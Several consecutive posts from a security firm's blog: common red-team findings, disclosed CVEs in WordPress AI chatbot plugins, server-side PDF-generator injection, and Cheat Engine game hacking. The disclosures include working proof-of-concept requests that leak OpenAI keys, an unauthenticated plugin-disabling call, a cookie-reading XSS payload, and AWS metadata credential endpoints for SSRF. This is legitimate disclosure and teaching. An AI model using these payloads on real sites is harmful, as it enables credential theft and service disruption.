Flawed Foundations – Issues Commonly Identified During Red Team Engagements

Cybersecurity Red Team engagements are exercises designed to simulate adversarial threats to organisations. They are founded on the real-world Tactics, Techniques, and Procedures that cybercriminals, nation states, and other threat actors employ when attacking an organisation, and they are a tool for exercising detection and response capabilities and for understanding how the organisation would react in the event of a real-world breach.

One of the outcomes of such exercises is increased awareness of the vulnerabilities, misconfigurations and gaps in systems and security controls which could result in the organisation’s compromise, impacting business delivery and causing reputational, financial, and legal damage.

Threat actors rarely need to employ cutting-edge capabilities or “zero day” exploits in order to compromise an organisation. Organisations grow organically and exist to deliver their business; as a result, security is often not a key consideration from their founding. This means that critical issues can exist in the foundations of the organisation’s IT which threat actors will be more than happy to abuse.

This post covers five of the most common vulnerabilities we regularly see when conducting red team engagements for our clients. Its purpose is to raise awareness among IT professionals and business leaders about potential security risks.

Insufficient Privilege Management

This issue arises when accounts are provided with greater privileges within the organisation than they require to conduct their work. It can present as users who have local administrator privileges, accounts that have been given indirect administrator privileges, or overly privileged service accounts.

Some examples include:

  • Users who are all local administrators on their work devices – This gives them the ability to install any software they might need to conduct their work, but it also exposes the organisation to significant risk should that device or user account become compromised. If users do require privileges on their laptops, then they should also be provided with a corporate virtual device (either cloud- or host-based), which has different credentials from their base laptop and is the only device permitted to connect to the corporate infrastructure. This limits the exposure while permitting staff to continue to operate. In a red team, local administrator access permits us to abuse a machine account and bypass numerous security tools and controls which would normally impede our ability to operate.
  • Users with indirect administrator privileges – In Microsoft Windows domains, users can belong to groups, but groups can also belong to other groups, and users can therefore inherit privileges through this nesting. Whilst it was never the intention to grant a user administrator privileges, and whilst the user may be unaware that they have been given this power, such a misconfiguration can arise quite easily and exposes the organisation to considerable risk. It can only be addressed through in-depth analysis of Active Directory and consistent auditing, combined with sound system architecture. This sort of subtle misconfiguration only really becomes apparent when a threat actor or red team starts to enumerate the Active Directory environment; when found, though, it rapidly leads to a full organisational compromise.
  • Overly privileged service accounts – Service accounts exist to ensure that specific systems such as databases or applications are able to authenticate users accessing them from the domain and to provide domain resources to the system. A common misconfiguration is granting them high levels of privilege during installation even though they do not require them. Service accounts, due to the way they operate, need to be exposed, and threat actors who identify overly privileged accounts can attempt to capture an authentication made using the service. This can be attacked offline to retrieve the password, which can then lead to greater compromise within the estate. Service accounts should be regularly audited for their privileges, and where possible these should be removed or restricted (a sketch of one such audit query follows this list). If it is not a domain managed service account (a feature made available from Windows Server 2012 R2 onwards), then ensuring the service account has a password of at least 16 characters, recorded in a secure fashion in case it is required in the future, will severely restrict a threat actor’s ability to abuse it. Abuse of service accounts is becoming rarer, but legacy systems which do not support long passwords mean there are still significant numbers of these accounts present. Whether they can be abused is often tied to whether they have logon rights across the network, and identifying their compromise can be problematic if the threat actor or red team operates in a secure manner.
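As an illustration of the kind of audit described above, the sketch below uses LDAP to list accounts that have a servicePrincipalName set – the same property a threat actor would enumerate before attempting to capture and crack a service authentication. The server, credentials and base DN are placeholders, and the ldap3 Python library is assumed to be available; treat this as a starting point rather than a complete audit.

from ldap3 import Server, Connection, NTLM, SUBTREE

# Placeholders – replace with values for your own domain.
DC_HOST = "dc01.example.local"
BASE_DN = "DC=example,DC=local"
AUDIT_USER = "EXAMPLE\\svc-audit"
AUDIT_PASS = "changeme"

server = Server(DC_HOST)
conn = Connection(server, user=AUDIT_USER, password=AUDIT_PASS,
                  authentication=NTLM, auto_bind=True)

# Accounts with a servicePrincipalName are exposed to offline password attacks,
# so their group memberships (privileges) deserve particular scrutiny.
conn.search(BASE_DN,
            "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))",
            search_scope=SUBTREE,
            attributes=["sAMAccountName", "servicePrincipalName", "memberOf"])

for entry in conn.entries:
    print(entry.sAMAccountName, entry.memberOf)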

Poor Credential Complexity and Hygiene

This issue arises when users are given no corporately supported method of storing credential material; as a result, the passwords chosen are often easy to guess or predict, and they are stored in browsers, in clear-text files on network shared drives, or on individual hosts.

  • Credential Storage – Staff will often use plain-text files, Excel documents, emails, OneNote notebooks, Confluence pages, or browsers to store credentials when there is no corporately provided solution. The problem with all of these options is that they are insecure – the passwords can be retrieved using trivial methods, which means the organisation is often one step away from a significant breach. Password vaults such as LastPass, Bitwarden, KeePass, 1Password, etc., whilst targets for threat actors, do offer considerably greater protection, as long as the credentials used to unlock them are not single factor or stored with the vault. It is standard practice for red teams and threat actors to try to locate clear-text credentials, and attacking vaults significantly increases the difficulty and complexity of the tradecraft required when the material to unlock the vault uses MFA or is not stored locally alongside it.
  • Credential Complexity – Over the last 20 years the advice on password complexity has changed considerably. We used to advise staff to rotate passwords every 30/60/90 days, choose random mixes of uppercase, lowercase, numbers and punctuation, and meet a minimum length; today we advise not rotating passwords regularly, and instead choosing a phrase or three random, easy-to-memorise words combined with punctuation and numbers. The reason is that as computational power has increased, shorter passwords, regardless of their composition, have become easier to break. Furthermore, when staff rotated passwords regularly, it would often result in just a number changing rather than an entirely new password being generated, making them easy to predict. Education is critical in addressing this, and many password vaults also offer a password generator that can make management easier for staff whilst still complying with policies (a minimal generator sketch follows this list). Too often I have seen weak passwords which complied with password complexity policies, because people will seek the simplest way to comply. Credential complexity buys an organisation time – time to notice a breach – and raises the effort a threat actor must invest in order to attack the organisation effectively.
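To illustrate the “three random words” guidance above, the short Python sketch below generates a passphrase from a local wordlist using the secrets module. The wordlist path is a placeholder (any file with one word per line, such as the EFF long wordlist, will do); corporate password managers typically offer equivalent generators built in.

import secrets

# Placeholder path – any wordlist with one word per line will do.
with open("wordlist.txt") as f:
    words = [w.strip() for w in f if w.strip()]

separator = secrets.choice("!$%-_.")
passphrase = separator.join(secrets.choice(words).capitalize() for _ in range(3))
passphrase += str(secrets.randbelow(90) + 10)   # append two digits for legacy policies

print(passphrase)   # e.g. Copper!Window!Basket47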

Insufficient Network Segregation

This issue occurs when a network is kept flat – hosts are allowed to connect to any server or workstation within the environment on any exposed port, regardless of department or geographical region. It also covers cases where clients which connect to the network using a VPN are not isolated from other clients.

  • VPN Isolation – Clients which connect to the network through a VPN to access domain resources such as file shares can be communicated with directly from other clients. Threat actors can abuse this by seeding network resources with material that forces any client which loads it to connect to a compromised host, often a compromised client device. When this occurs, the connecting host transmits encrypted user credentials to authenticate with the device; these can be taken offline by the threat actor and cracked, which could result in greater compromise of the network. Isolating hosts on a VPN limits where the threat actor, or red team, can pivot their attacks, and makes it easier to identify and isolate malicious activities.
  • Flat Networks – Networks are often implemented to ensure that the business can operate efficiently, and the easiest implementation is a flat network where any networked resource is made available to staff regardless of department or geographical location, with access managed purely by credentials and role-based access control (RBAC). Unfortunately, this configuration will often expose administrative ports and devices which can be attacked. When a threat actor manages to recover privileged credentials, a flat network offers them significant advantages for further compromise of the organisation. Segregating management ports and services, breaking up regions and departments, and restricting access to resources based on requirements will severely restrict and delay a threat actor’s – and red team’s – ability to move around the network and impact services.

Weak Endpoint Security

Workstations are often the first foothold achieved by threat actors when attacking an organisation. As a result, they require constant monitoring and controls to ensure they stay secure. This can be achieved through a combination of maintained antivirus, effective Endpoint Detection and Response, and application control. Furthermore, controlling which endpoint devices are allowed to connect to the network will limit the exposure of the organisation.

  • Unmanaged Devices – Endpoints that are not regularly monitored or managed increase risk. Permitting Bring Your Own Device (BYOD) can increase productivity as staff can use devices they have customised; however, it also exposes the organisation, as these devices may not comply with the organisation’s security requirements. This compounds issues when a threat is detected, as identifying a rogue device becomes much more difficult when every BYOD device must be treated as potentially rogue. Furthermore, you have little insight into where else these devices have been used, or who else has used them. By only permitting managed devices on your network, and ensuring that BYOD devices, if they must be used, are severely restricted in terms of what they can access, you can limit your exposure to risk. Restrictions on managed devices can be bypassed, but doing so raises the complexity and sophistication of the tradecraft required, which means it takes longer and there is a greater chance of detection.
  • Anti-Virus – It used to be the case that anti-virus products were the hallmark of security for devices. However, the majority of these work on signatures, which means they are only effective against threats that have been identified and are listed in their definition files. Threat actors know this and will often change their malware so that it no longer matches known signatures and can therefore evade detection. This means the protection anti-virus offers is limited, but if well maintained it can reduce the organisation’s exposure to common attacks and provide a tripwire defence should a capable adversary deploy tooling that has previously been signatured. Bypassing antivirus can be trivial, but it provides an additional layer of defence which can increase the complexity of a red team’s or threat actor’s activities.
  • Lack of Endpoint Detection and Response (EDR) configuration – EDR goes one step beyond antivirus and looks at all of the events occurring on a device to identify suspicious tools, behaviours, and activities that could indicate a breach. Like anti-virus, EDR will often work with detection heuristics and rules which can be centrally managed, and it permits the organisation to isolate suspected devices. However, it requires significant time to tune for the environment, as normal activity for one organisation may be suspicious in another. Unfortunately, EDR can be costly, both to implement and then to maintain correctly – and it is only effective when it is on every device. Too often, organisations will not spend time using it, or do not understand the difference between the basic rules and tuned rules; false positives can then impact the business and lead to a lack of trust in the tooling. Lacking an EDR product severely restricts an organisation’s ability to detect and respond to threats in a capable and effective manner. Well-maintained and effective EDR operated by a well-resourced, exercised security team significantly impacts threat actor and red team activities, often bringing the Mean Time to Detect a breach down from days/weeks to hours/days.
  • Application Control – When application allowlisting was first introduced, it was clunky and often broke business applications. It has evolved since those early days, but is still not well implemented by organisations. It takes significant initial investment to implement properly, but it strongly restricts a threat actor’s ability to operate in an environment. Good implementations are based on user roles; most employees require a browser and basic office applications to conduct their work. From there, additional applications can be allowed depending on the role, and users who do not have application control applied are given segregated devices to operate on, which helps limit exposure. Without this, threat actors and red teams can often run multiple tools which most users have no business using during their day jobs. It can also result in shadow IT as users introduce portable apps to their devices, which makes investigation of incidents difficult as it muddies the water in terms of whether something is legitimate use or threat actor activity.

Insufficient Logging and Monitoring

If an incident does occur – and remember that red team engagements are also about exercising the organisation’s ability to respond – then logging and monitoring become paramount to an effective response. When we have exercised organisations in the past, we often find that at this stage of the engagement a number of issues quickly become apparent that prevent the security teams from being effective. These are most often linked to a lack of centralised logging, poor incident detection, and log retention issues.

  • Lack of Centralised Logging: Threat actors have been known to wipe logs during their activities; when this occurs on compromised devices, it makes detecting activities difficult and reconstruction of threat actor activity impossible. Centralising logs allows additional tooling to be deployed as a secondary defence to detect malicious activity so that devices can be isolated; it also makes reconstruction of events significantly easier. Many EDR products support centralised logging, but only on devices which have agents installed and on supported operating systems; to make this effective, additional tooling such as syslog and Sysmon may be needed to ensure that logging is sent to centralised hosts for analysis and curation (a minimal log-forwarding sketch follows this list). Centralised logs can also be easier to store for longer periods of time, permitting effective investigations to understand how, what and where the threat actor or red team has been operating, and what they accomplished before being detected and containment activities undertaken.
  • Poor Incident Detection: Organisations which do not regularly exercise their security teams will respond poorly when an incident occurs. Staff need to practise using SIEM (Security Information and Event Management) tooling, and develop playbooks and queries that can be run against the monitoring software in order to locate and classify threats. When this does not happen, separating genuine threats from background user activity becomes tedious, difficult, and ineffective, resulting in poor containment and ineffective response behaviours. In red teams, this can result in alerts being ignored or classed as false positives, which exacerbates an incident.
  • Log Retention Issues: Many organisations keep, at most, 30 days of logs. Furthermore, many organisations think they have longer retention than this because they have 180 days of alert retention, not realising that alerts and logs are different things. As a result, we can often review alerts as far back as six months, but can only see what happened around those alerts for 30 days. Many threat actors know about this shortcoming and will often wait 30 days once established in the network before conducting their activities, making it difficult for responders to know how they got in, how long they have been there, and where else they have been. This often comes up in red teams, as many engagements run for at least four weeks, if not longer, to deliver a scenario, which makes exercising detection and response difficult when this issue is present.
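As a minimal illustration of forwarding events to a central collector (referenced under “Lack of Centralised Logging” above), the sketch below uses Python’s standard SysLogHandler. The collector address is a placeholder; in practice agents such as Sysmon plus a log shipper, or the EDR’s own forwarding, would do this work at scale.

import logging
import logging.handlers

# Placeholder collector address – point this at your central syslog/SIEM ingest.
handler = logging.handlers.SysLogHandler(address=("syslog.example.local", 514))
logger = logging.getLogger("app-audit")
logger.setLevel(logging.INFO)
logger.addHandler(handler)

# Events written here survive even if the originating host's local logs are wiped.
logger.info("user=jsmith action=share_access share=finance result=allowed")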

Conclusion

These are just the five most common issues we identify when conducting a red team engagement; however, they are not the only issues we come across. They are fundamental issues which become ingrained in organisations through a mixture of culture and a lack of deliberate architectural design considerations.

Red team engagements not only help shine a light on these sorts of issues but also allow the business to plan how to address them at a pace that works for it, rather than as a consequence of a breach. Additionally, red team engagements can help identify areas where additional focused testing would be valuable, provide a deeper understanding of identified issues, and exercise controls that are implemented following a red team engagement.

Basically, a red team engagement is just the start of, or a milestone marker in, an organisation’s security journey. It is used in tandem with other security frameworks and capabilities to deliver a layered, effective security function which supports an organisation in adapting, protecting, detecting, responding and recovering effectively in an ever-evolving world of cybersecurity threats.

Our Red Team services: https://prisminfosec.com/service/red-teaming-simulated-attack/

WordPress AI Plugins: Tell me a secret 

In our previous blog ‘WordPress Plugins: AI-dentifying Chatbot Weak Spots’ (https://prisminfosec.com/wordpress-plugins-ai-dentifying-chatbot-weak-spots/), a series of issues was identified within AI-related WordPress plugins:

  • CVE-2024-6451 – Admin + Remote-Code-Execution (RCE) 
  • CVE-2024-6723 – Admin + SQL Injection (SQLi) 
  • CVE-2024-6847 – Unauthenticated SQL Injection (SQLi) 
  • CVE-2024-6843 – Unauthenticated Stored Cross-Site Scripting (XSS) 

Today, we will be looking at further vulnerability types within these plugins that don’t provide us with the same adrenaline rush as popping a shell, but clearly show how AI plugins are being rushed through development without thorough consideration for secure coding practices. Prism Infosec was attributed the following CVEs:

  • CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure 
  • CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure 
  • CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls 
  • CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS 

All vulnerabilities mentioned above were submitted to WPScan, who effectively managed the steps required to resolve the issues with the respective plugin owners.

CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure 

WPScan: https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26 

‘The plugin does not have proper authorisation in one of its REST endpoints, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key.’

Within the plugin source code, namely the ‘wdgpt-api-requests.php’ file, an action was identified with a route of ‘/wp-json/wdgpt/v1/api-key’ that allowed unauthenticated requests to be sent to retrieve an encoded OpenAI Secret key that is configured within the plugin settings. 

Figure 1: wdgpt_retrieve_api_key identified in source code. 

Upon reviewing the ‘wdgpt_retrieve_api_key’ function, an interesting check was being performed on a ‘key’ parameter sent within the request whereby a comparison was being made on a (not so) secret code. 

Figure 2: Secret code exposed in source code alongside OpenAPI key decoding logic. 

In order for the request to be successful, a JSON value of {"key":"U2FsdGVkX1+X"} needed to be sent within the POST request.

This secret key remained unchanged across all plugin installations, and combining it with the unauthenticated endpoint ‘/wp-json/wdgpt/v1/api-key’ allowed the ROT13-encoded OpenAI secret key to be retrieved.

Figure 3: OpenAI API key retrieval. 

Decoding the ROT13 key with the following Bash script revealed the OpenAI key in use.

#!/bin/bash
# ROT13-decode the value supplied as the first argument
echo "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
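For completeness, the two steps can be combined into a single Python sketch – send the static ‘key’ value to the unauthenticated endpoint, then ROT13-decode the response. The target URL is a placeholder and the exact response format may vary between plugin versions, so treat this as illustrative only.

import codecs
import requests

# Placeholder target – a WordPress site running a vulnerable SmartSearchWP version.
url = "https://target.example/wp-json/wdgpt/v1/api-key"

resp = requests.post(url, json={"key": "U2FsdGVkX1+X"}, timeout=10)
encoded = resp.text.strip().strip('"')   # response observed to contain the ROT13-encoded key
print(codecs.decode(encoded, "rot13"))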

CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure 

WPScan: https://wpscan.com/vulnerability/061eab97-4a84-4738-a1e8-ef9a1261ff73 

‘The plugin discloses the OpenAI API Key, allowing unauthenticated users to obtain it.’

Similar to the previous issue (but somehow worse), the OpenAI secret key was found to be disclosed to all users of the chatbot. The Authorization header contained the plaintext value of the API key set within the plugin configuration. This allowed an unauthenticated user to compromise the OpenAI secret key set in the application simply by sending a message through the chatbot.  

Configuration of the OpenAI API key resided within the admin console located at the following URL:  

  • /wp-admin/admin.php?page=ays-chatgpt-assistant&ays_tab=tab3&status=saved 

Once set, the chatbot functionality was available to unauthenticated users by default. By intercepting the request, it was identified that a client-side request was being sent directly to OpenAI, containing the secret key within the Authorization header.  

Request: 

POST /v1/chat/completions HTTP/2
Host: api.openai.com
Content-Length: 312
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Content-Type: application/json
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer sk-proj-oL…[REDACTED]…sez

{"temperature":0.8,"top_p":1,"max_tokens":1500,"frequency_penalty":0.01,"presence_penalty":0.01,"model":"gpt-3.5-turbo-16k","messages":[{"role":"system","content":"Converse as if you are an AI assistant. Answer the question as truthfully as possible. Language: English. "},{"role":"user","content":"Hi there!"}]}

CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls 

WPScan: https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664 

‘The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback.’

During source code analysis of the plugin, a ‘wp_ajax_nopriv’ function named ‘ays_chatgpt_admin_ajax’ was identified.  

Figure 4: Unauthenticated admin endpoint identified in source code. 

Upon further inspection of the function contained within the file ‘class-chatgpt-assistant-admin.php’, a ‘function’ parameter sent within the request was being checked to first confirm if a null value was present, before passing the value onto an ‘is_callable’ function, which is used to ‘Verify that a value can be called as a function from the current scope’.  

This essentially allowed for any function within the scope of ‘class-chatgpt-assistant-admin.php’ to be called.  

Figure 5: Function parameter value passed to is_callable() to access specified function. 

The functions that could be accessed from an unauthenticated context included:  

  • ays_chatgpt_disconnect 
  • ays_chatgpt_connect 
  • ays_chatgpt_save_feedback 

By sending the following request from an unauthenticated context it was possible to ‘disconnect’ the current running configuration from OpenAI, essentially performing a Denial of Service for the chatbot functionality.  
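A minimal Python approximation of that request is shown below. The endpoint is WordPress’s standard admin-ajax.php; the action name is inferred from the nopriv hook identified above, the target URL is a placeholder, and parameter handling may differ slightly between plugin versions.

import requests

# Placeholder target running a vulnerable AI Assistant with ChatGPT version.
url = "https://target.example/wp-admin/admin-ajax.php"
data = {
    "action": "ays_chatgpt_admin_ajax",     # nopriv hook name (assumed action value)
    "function": "ays_chatgpt_disconnect",   # callable reached via is_callable()
}

resp = requests.post(url, data=data, timeout=10)
print(resp.status_code, resp.text)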

Figure 6: Disconnecting the plugin configuration from OpenAI. 
Figure 7: api_key setting updated to empty value. 

CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS 

WPScan: https://wpscan.com/vulnerability/ce909d3c-2ef2-4167-87c4-75b5effb2a4d 

‘The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).’

Testing identified that the plugin’s settings functionality did not effectively sanitise inputs, and as such allowed malicious payloads such as JavaScript code to be accepted and executed within chatbot instances for visiting users.

As seen in the screenshot below, the payload ‘<img src=123 onerror=alert(document.cookie)>’ was inserted into the Starting Message input within the settings page located at:

  • /wp-admin/options-general.php?page=chatbot-support-ai-settings 
Figure 8: XSS payload injected into chatbot starting message value. 

The result of this was that the JavaScript executed within chatbot instances whenever users visited the application.

Figure 9: XSS payload triggered on new instance of chatbot. 

It is accepted that this vulnerability required administrator privileges to set up the exploit successfully; however, as the issue impacted all visiting users, it would allow malicious scripts to be distributed through the plugin, which could lead to further attacks against other third-party services under the guise of the visiting users’ resources.

Get Tested

If you are integrating or have already integrated AI or chatbots into your systems, reach out to us. Our comprehensive range of testing and assurance services will ensure your implementation is smooth and secure: https://prisminfosec.com/services/artificial-intelligence-ai-testing 

All vulnerabilities were discovered and written by Kieran Burge of Prism Infosec.  

Breaking PDFs with Server-Side Shenanigans

Introduction

Generating PDFs from user-supplied content is very common functionality within modern web applications, be it producing a receipt for an online purchase or generating a report based on user-supplied content collected by the application. There are endless applications for this functionality.

Dynamic PDF generation holds significant potential for a wide range of applications, and as a result there are many third-party libraries (some open source) available that provide developers with the functionality of generating a dynamic PDF with user-supplied content.

The following sections will break down the potential attack surface that may be exposed once such functionality is implemented in a web application, discussing how to identify vulnerabilities, some known attacks, as well as how to mitigate this type of issue.

Background

Many third-party libraries exist to perform the task of PDF generation; most take in HTML and CSS code and use it to structure the layout of the final PDF.

Popular Third-Party Libraries

  • PDFKit – JavaScript
  • iText – Java
  • Wkhtmltopdf – C++
  • FPDF – PHP
  • IronPDF – .NET

There are checks that can be performed to identify what library and sometimes what version of the library is in use. Checking the ‘Document Properties’ of a PDF will often leak the “PDF Producer” in the document meta-data.

The example below shows the document properties of an invoice generated by Amazon for a recent online purchase. As seen highlighted in the figure below, the “PDF Producer” field tells us which library is being used as well as the specific version of that library:

Checking the Document Properties will often provide a clear indication of whether the PDF has been generated client-side or server-side. It is safe to assume that the PDF in the screenshot above has been generated server-side using iText 2.0.8.
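Checking the producer programmatically is straightforward; the sketch below uses the pypdf Python library to read the metadata of a saved PDF (the filename is a placeholder). Other PDF toolkits expose the same field.

from pypdf import PdfReader

# Placeholder filename – any PDF exported from the target application.
reader = PdfReader("invoice.pdf")
meta = reader.metadata

# The Producer field typically names the generation library and its version.
print(meta.producer if meta else "No document metadata present")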

Basic Discovery

The first check is identifying the vulnerable input by attempting to inject some additional HTML elements into the page to understand how the application handles it. Adding in some <h1> tags before your input will suffice and will make it clear when a potentially vulnerable input has been identified.

In performing this check, the tester will be able to confirm two things:

  • The application does not correctly sanitise user-input.
  • The application does not encode “malicious” characters.

The result:

Exploit

Now we’ve confirmed it’s possible to add additional HTML, how can this vulnerability be exploited further? How does the application handle ‘<script>’ or ‘<img>’ tags?

Attempt to use any of the following scripts to identify the presence of JavaScript. Note that, depending on implementation and configuration, <script> tags may be disabled; in that case, be more creative and use other HTML elements.

Basic Discovery Scripts

  • <img src="x" onerror="document.write(document.location.href)" />
  • <script>document.write(JSON.stringify(window.location))</script>
  • <svg/onload=document.write(document.location.href)>

The result:

Instead of the PDF generator simply rendering the code as text on the screen, it attempts to run the script server-side, allowing us to write the ‘document.location.href’ value to the page.

Once you have confirmed that it is possible to inject HTML and JavaScript into the document for the server to run, what else is achievable?

Local File Inclusion

“The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.” – OWASP https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion

It is possible to leverage this vulnerability to include a local file on the server and render the contents of the file into the PDF document.

Consider using one of the following scripts:

The result:

In this example, the contents of the /etc/passwd file are displayed; however, depending on the library and its implementation, it may be possible to read any file – such as SSH keys to gain unauthorised access to the system, or configuration files containing plain-text passwords to elevate privileges within the application.

Server-Side Request Forgery

“In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed.” – OWASP https://owasp.org/www-community/attacks/Server_Side_Request_Forgery

As we have confirmed with our previous attack that it is possible to create and send XMLHttpRequests inside <script> tags, we can attempt to abuse this functionality to identify any internal services running.

If a web server is hosted within an AWS environment, then a malicious user may be able to extract important configuration and sometimes even authentication keys by accessing the internal REST interface located at http://169.254.169.254/latest/meta-data. By default, the AWS EC2 metadata service is only accessible from the specific EC2 instance it is associated with and should never be exposed externally. However, with this vulnerability, requests come from the server and the responses are rendered into the PDF, allowing us to access the service.

Useful AWS endpoints to query

  • http://169.254.169.254/latest/meta-data/iam/security-credentials/ – lists the IAM role names attached to the instance; appending a role name returns temporary credentials
  • http://169.254.169.254/latest/meta-data/hostname – the instance’s internal hostname
  • http://169.254.169.254/latest/user-data – any user data supplied at launch, which frequently contains secrets

Prevention/Conclusion

Though very serious when exploited fully, in most scenarios this issue is relatively easy to fix or prevent. Having walked through some basic discovery methods and some sample attacks, it is possible to identify the weaknesses in the PoC above:

  • Input Validation
  • Output Encoding

The application makes no effort to validate any of the input received from a user; in the scenario above it is possible to insert HTML and JavaScript code into the address field of our form. The application is not checking whether a valid address has been supplied, nor is it validating that the input supplied is only text before sending it to the web server.

Additionally, the application makes no effort to encode any of the data supplied by a user. PDFs render HTML entities as literal text when the associated entity code is supplied, so an extra measure to ensure that a payload will not trigger – and is instead rendered as text should a user bypass the input validation – is to convert ‘dangerous’ characters to their associated HTML entities.

Character    HTML Character Entity
&            &amp;
<            &lt;
>            &gt;
"            &quot;
'            &#x27;
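As a simple sketch of this output-encoding step, Python’s standard html.escape performs exactly this conversion before the data reaches the PDF template; most languages and template engines provide an equivalent.

import html

# Example payload from the discovery steps above.
user_address = '<img src="x" onerror="document.write(document.location.href)" />'

# Convert dangerous characters to HTML entities so they render as literal text.
safe_address = html.escape(user_address, quote=True)
print(safe_address)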

It is also often worth checking the PDF generator library’s developer documentation for any additional optional security controls that could protect the application from being exploited further. Specific to the example, the application is making use of the wkhtmltopdf library to generate PDFs, and reading the developer documentation shows that the local file inclusion vulnerability could be prevented by rendering PDFs with the ‘--disable-local-file-access’ flag, which prevents the tool from accessing local files.

In conclusion, there is nothing new about this vulnerability, yet it is not uncommon to find vulnerabilities of this type during a web application assessment. Though ‘simple’ to resolve, this type of vulnerability is easy to overlook, especially if a developer is unaware of the potential issues surrounding the functionality. The golden rule still applies: a developer should never implicitly trust user-supplied content and should always check the supplied input against an approved list of allowed characters, so as to ensure only expected text is submitted to the application.

Blog post was written by Jeremy Griffin of Prism Infosec.

Unveiling the Virtual Battlefield: A Journey into Game Hacking and Reverse Engineering

In the ever-evolving realm of digital entertainment, where creativity converges with cutting-edge technology, a subversive art form emerges — game hacking. Beyond the pixels and polygons lies a labyrinth of code waiting to be deciphered, manipulated, and reimagined. This intriguing practice not only kindles the flames of curiosity but also serves as a pivotal gateway into the realm of reverse engineering. Aspiring enthusiasts seeking to unravel the enigma of game hacking often find themselves treading the path of reverse engineering, a domain intertwined with the understanding of software, memory structures, and the inner workings of programs.

At its core, game hacking is a captivating pursuit that involves exploring the intricate tapestry of video games, probing for chinks in their digital armour, and bending the rules to one’s advantage. It’s the art of peering beneath the glossy surface of gaming universes to understand the mechanisms that govern them. Be it harnessing superhuman abilities, manipulating in-game economies, or altering the very fabric of virtual reality, game hacking offers an avenue for players to transcend the constraints set by developers.

One of the foundational concepts that underpins game hacking and reverse engineering is the storage of values in a game’s memory. Games, like finely choreographed performances, rely on the synchronisation of various elements. Whether it’s the player’s health, ammunition count, or the score, these values find their abode within the memory of a running game. Unravelling the enigma of memory storage not only grants insights into a game’s mechanics but also equips the budding hacker with the power to manipulate these values at will.

This blog post will serve as an introduction to game hacking and reverse engineering and the use of Cheat Engine. Towards the end of the post, Prism Infosec will look at tricks and techniques game developers can use to prevent tampering with their games. To follow along fully with this post, it is recommended that the reader has a basic level of understanding of reverse engineering.

Cheat Engine in a Nutshell

Cheat Engine is essentially a memory scanner and editor, acting as a bridge between the player’s intentions and the game’s codebase. The process begins by selecting a game process to analyse. Cheat Engine scans the game’s memory space, a realm where values like health, score, or resources reside. It does so by systematically examining memory addresses, each of which holds a specific value. By altering these values, players can, for instance, boost their character’s health, acquire infinite ammunition, or acquire unlimited gold.

Once the desired value is located, Cheat Engine reveals its true prowess: freezing, modifying, or even injecting new values into the game’s memory.

Starting off, we have the main Cheat Engine UI. The majority of the functionality will be glossed over for this post; we will focus on the core features.

Highlighted below are the following functions:

  1. The “Scan Type” selection allows users to define the type of search they want to conduct within the game’s memory. Whether it’s an exact value, a value increased or decreased by a certain amount, or a value that has changed, this option shapes the nature of the scanning process.
  2. Users can choose the “Value Type” to specify the data format of the value they’re seeking. Whether it’s an integer, floating-point number, or another data structure, this setting ensures accurate scanning and manipulation.
  3. In the “Value” field, users input the specific numerical value they’re searching for within the game’s memory. Coupled with the other search criteria, this parameter guides Cheat Engine in locating and interacting with the desired value in the game’s code.
  4. The “First Scan” feature serves as the initial stride in Cheat Engine’s memory scanning process. It combs through the game’s memory for values that meet the specified criteria, setting the stage for further refinement.

A Practical Example

Finding values in memory

For this blog post, a third-person, point-and-click style RPG was chosen. The game lets users level up, collect weapons and defeat enemies, among a whole lot of other things.

During games, it is common for players to die a lot, but what if this could be prevented by giving the player infinite health, or changing things so the health value never drops? Using Cheat Engine, it is possible to manipulate the health value to do exactly that.

Conveniently, the game displays the value of the current player’s health when hovering over the UI elements.

For this game, it is assumed that the values will be stored as 4-byte data types. Below, by searching for the health value and clicking “First Scan”, a list of possible results is displayed. Note the “Address” column, which displays the memory address that holds the value. The “First” column shows what the value was when first observed, and the “Previous” column shows what the value was before it changed (if it changed).

As the scan has generated over 125 results, it cannot be determined straight away which one is the health value. A good way to narrow down the results is to change the value in some way; in this instance, the player can take damage from a monster to decrease it.

After taking damage, notice in the bottom left-hand corner below that the health value has now changed to 318:

Scanning for the updated value in memory by selecting “Next Scan” (which searches based on the previously searched value to narrow down the results), you will notice a change in the number of results – in this case there are now three:

At this point, it still can’t be determined which address holds the health value, so the next step is to try to manipulate each one to see if it affects the on-screen value. By double-clicking each value, they are added to the address list in the bottom pane of the main Cheat Engine window.

